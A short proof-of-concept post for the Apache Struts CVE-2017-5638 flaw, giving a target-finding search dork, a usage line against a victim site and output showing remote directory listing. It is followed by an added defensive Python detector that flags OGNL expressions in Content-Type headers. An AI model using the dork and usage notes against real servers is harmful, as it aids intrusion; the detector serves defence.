Example PoC Code for CVE-2017-5638 | Apache Struts Exploit | DORK: ext:action
USAGE: python struts.py https://victim.site dir
The initial Python script that was posted didn't correctly format the Content-Type header. I recoded the Content-Type header to properly format Content-Type:%20{Exploit}. I also added logging and Requests, then dumped the object properties to stdout.
SAMPLE OUTPUT
Check for CVE-2017-5638 by XSS.Cx
Volume in drive D has no label.
Volume Serial Number is 2A7B-A245
Directory of d:\Program Files\Apache Software Foundation\Tomcat 9.0
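
A detection-side check for the Content-Type header this script relies on, added here as an example and not part of the original post or script: it flags values that contain an OGNL expression opener or that do not parse as an RFC 7231 media type. The function names, the 256-character ceiling and the sample records are assumptions constructed for illustration.

```python
import re

# RFC 7231 "token" characters; note that "{" and "}" are not among them.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_PARAM = rf'\s*;\s*{_TOKEN}=(?:{_TOKEN}|"[^"\\]*")'
MEDIA_TYPE = re.compile(rf"^{_TOKEN}/{_TOKEN}(?:{_PARAM})*\s*$")
# OGNL expression openers as Struts evaluates them: %{...} and ${...}
OGNL_OPENER = re.compile(r"[%$]\{")
MAX_LEN = 256  # assumed ceiling for a legitimate Content-Type value


def inspect_content_type(value):
    """Return a list of reasons the header value looks hostile (empty = clean)."""
    reasons = []
    if OGNL_OPENER.search(value):
        reasons.append("ognl-opener")
    if not MEDIA_TYPE.match(value.strip()):
        reasons.append("not-a-media-type")
    if len(value) > MAX_LEN:
        reasons.append("oversized")
    return reasons


def scan(requests):
    """Yield (source_ip, path, reasons) for each request worth alerting on."""
    for req in requests:
        reasons = inspect_content_type(req["content_type"])
        if reasons:
            yield req["src"], req["path"], reasons


# Constructed sample records (not real traffic); the payloads are placeholders.
SAMPLE = [
    {"src": "192.0.2.10", "path": "/login.action",
     "content_type": "application/x-www-form-urlencoded"},
    {"src": "192.0.2.11", "path": "/upload.action",
     "content_type": "multipart/form-data; boundary=----abc123"},
    {"src": "198.51.100.7", "path": "/index.action",
     "content_type": "%{PLACEHOLDER_EXPRESSION}.multipart/form-data"},
    {"src": "198.51.100.8", "path": "/index.action",
     "content_type": 'multipart/form-data; boundary="${PLACEHOLDER}"'},
]

if __name__ == "__main__":
    for src, path, reasons in scan(SAMPLE):
        print(f"ALERT {src} {path}: {', '.join(reasons)}")
```

The fourth record passes the media-type grammar because the expression sits inside a quoted parameter, which is why the opener check runs independently of the grammar check.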